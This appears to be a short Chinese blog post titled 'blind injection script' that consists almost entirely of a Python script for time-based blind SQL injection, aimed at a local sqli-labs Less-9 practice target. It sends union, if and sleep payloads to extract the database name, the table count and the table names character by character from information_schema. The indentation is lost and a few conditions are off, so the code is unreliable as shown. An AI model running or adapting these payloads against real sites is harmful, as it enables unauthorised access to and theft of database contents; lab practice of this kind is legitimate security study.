盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
import requests
import time

MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100

chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'

target_url = "http://192.168.119.135/sqli-labs/Less-9/?id=1"


def get_DBName_len():
print("Start to get DBName_len...")
DBName_len = 0
url_template = target_url + "' union select 1,2,if (length(database())={0},sleep(3),null) %2D%2D%20"

for i in range(0, MAX_DBName_len):
starttime = time.time()
url = url_template.format(i)
response = requests.get(url)

if time.time()-starttime > 3:
DBName_len = i;
print("DBName_len is: ", DBName_len)
break;

if DBName_len == 0:
if i == MAX_DBName_len - 1:
print("DBName_len > MAX_DBName_len!")
print("Cannot get DB_len. Program ended.")
exit()
return DBName_len

def get_DBName(DBName_len):
print("Start to retrieve database name...")
DBName = ""
url_template = target_url + "' union select 1,2, if(ascii(substr(database(),{0},1))={1},sleep(2),null) %2D%2D%20"
for i in range(1, DBName_len + 1):
tempDBName = DBName
for char in chars:
char_ascii = ord(char)
url = url_template.format(i, char_ascii)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
DBName += char
break
if tempDBName == DBName:
print("Letters too little! Program ended.")
exit()
print("Retrieve completed! DBName is: " + DBName)
return DBName

def get_TableNumOfDB(DBName):
print("Start to get TableNumOfDB...")
TableNumOfDB = 0
url_template = target_url + "' and if ((select count(table_name)a from information_schema.tables where table_schema = database() having a={0}),sleep(2),true) %2D%2D%20"
for i in range(0, MAX_Table_Num):
url = url_template.format(i)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
TableNumOfDB = i;
print("the number of table is:" , TableNumOfDB)
break
if TableNumOfDB == 0:
if i == TableNumOfDB - 1:
print("table number of database > MAX_TableName_len!")
return TableNumOfDB

def get_TableName_len(Table_num):
print("Start to get TableName_len...")
TableName_len = 0
url_template = target_url + "' and if (( (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)={1}),sleep(2),true) %2D%2D%20"
for i in range(0, MAX_TableName_len):
url = url_template.format(Table_num - 1, i)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
TableName_len = i
break
if TableName_len == 0:
if i == MAX_TableName_len - 1:
print("TableName_len > MAX_TableName_len!")
return TableName_len

def get_TableName(Table_num, TableName_len):
print("Start to get TableName...")
TableName = ""
url_template = target_url + "' and if ((ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}),sleep(2),true) %2D%2D%20"
for i in range(1, TableName_len + 1):
tempTableName = TableName
for char in chars:
char_ascii = ord(char)
url = url_template.format(Table_num - 1, i, char_ascii)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
TableName += char
break
if tempTableName == TableName:
print("Letters too little! Program ended.")
exit()
print("Retrieve completed! TableName is: " + TableName)
return TableName

#print("tables in "+DBName+":")
for i in range(0,4+1):
TableName_len = get_TableName_len(i)
TabName = get_TableName(i,TableName_len)
-------------END-------------
0%